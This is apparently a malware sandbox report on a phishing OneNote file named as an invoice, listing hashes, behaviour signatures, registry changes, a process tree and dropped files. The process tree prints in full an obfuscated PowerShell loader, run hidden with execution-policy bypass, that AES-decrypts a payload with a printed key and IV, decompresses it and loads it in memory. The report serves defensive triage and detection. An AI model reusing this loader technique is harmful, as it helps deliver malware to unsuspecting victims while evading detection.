b11b51ff96dc7a5f1cf9985087a6ad4f66980a2b2a9b1945acd43e39434c8dec

General

Target

Invoice #0098119.one
Size

203KB
MD5

058978e5a0620ea2acec6da70c93683f
SHA1

7f3bb69b17787470e01d4081104ac5ad012a0cde
SHA256

b11b51ff96dc7a5f1cf9985087a6ad4f66980a2b2a9b1945acd43e39434c8dec
SHA512

9f541872159512804adcc601391de4f05f2abc067a465f21fd8d9bb8eeba41f8e85f31a1d0e32600b23760f9dadd8530908e9b775c9ee8aee71119335b4bf69a
SSDEEP

3072:NqVr2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYTffD:cARiltZITy8ufjLQsBUlgeMYDhZ

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk	ONENOTE.EXE

Executes dropped EXE 1 IoCs

pid	Process
1660	kk.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
1540	cmd.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BLANK.ONE	ONENOTE.EXE
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE	ONENOTE.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	ONENOTE.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	ONENOTE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	ONENOTE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	ONENOTE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	ONENOTE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	ONENOTE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	ONENOTE.EXE

Modifies registry class 6 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\ = "Microsoft OneNote 12.0 Object Library"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\2"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\ = "Microsoft OneNote 14.0 Object Library"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\3"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ONENOTE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ONENOTE.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1736	ONENOTE.EXE
1736	ONENOTE.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1660	kk.bat.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: 33	616	ONENOTEM.EXE
Token: SeIncBasePriorityPrivilege	616	ONENOTEM.EXE
Token: SeDebugPrivilege	1660	kk.bat.exe
Token: 33	1736	ONENOTE.EXE
Token: SeIncBasePriorityPrivilege	1736	ONENOTE.EXE
Token: SeShutdownPrivilege	1736	ONENOTE.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
616	ONENOTEM.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
616	ONENOTEM.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE
1736	ONENOTE.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 616	1736	ONENOTE.EXE	31
PID 1736 wrote to memory of 616	1736	ONENOTE.EXE	31
PID 1736 wrote to memory of 616	1736	ONENOTE.EXE	31
PID 1736 wrote to memory of 616	1736	ONENOTE.EXE	31
PID 1736 wrote to memory of 1540	1736	ONENOTE.EXE	33
PID 1736 wrote to memory of 1540	1736	ONENOTE.EXE	33
PID 1736 wrote to memory of 1540	1736	ONENOTE.EXE	33
PID 1736 wrote to memory of 1540	1736	ONENOTE.EXE	33
PID 1540 wrote to memory of 1660	1540	cmd.exe	35
PID 1540 wrote to memory of 1660	1540	cmd.exe	35
PID 1540 wrote to memory of 1660	1540	cmd.exe	35
PID 1540 wrote to memory of 1660	1540	cmd.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice #0098119.one"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
  /tsr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe
    "kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat

Filesize
182KB

MD5
df4da1ecd4c50871a1c4315f571e4402

SHA1
1dbbe9b3784cf5ecdd08b27132a7e31588954865

SHA256
9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8

SHA512
5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/1660-66-0x000000006C0D0000-0x000000006C67B000-memory.dmp

Filesize
5.7MB

Download
memory/1660-67-0x000000006C0D0000-0x000000006C67B000-memory.dmp

Filesize
5.7MB

Download
memory/1736-54-0x00000000729D1000-0x00000000729D3000-memory.dmp

Filesize
8KB

Download
memory/1736-55-0x0000000076411000-0x0000000076413000-memory.dmp

Filesize
8KB

Download
memory/1736-56-0x00000000739BD000-0x00000000739C8000-memory.dmp

Filesize
44KB

Download
memory/1736-59-0x00000000739BD000-0x00000000739C8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing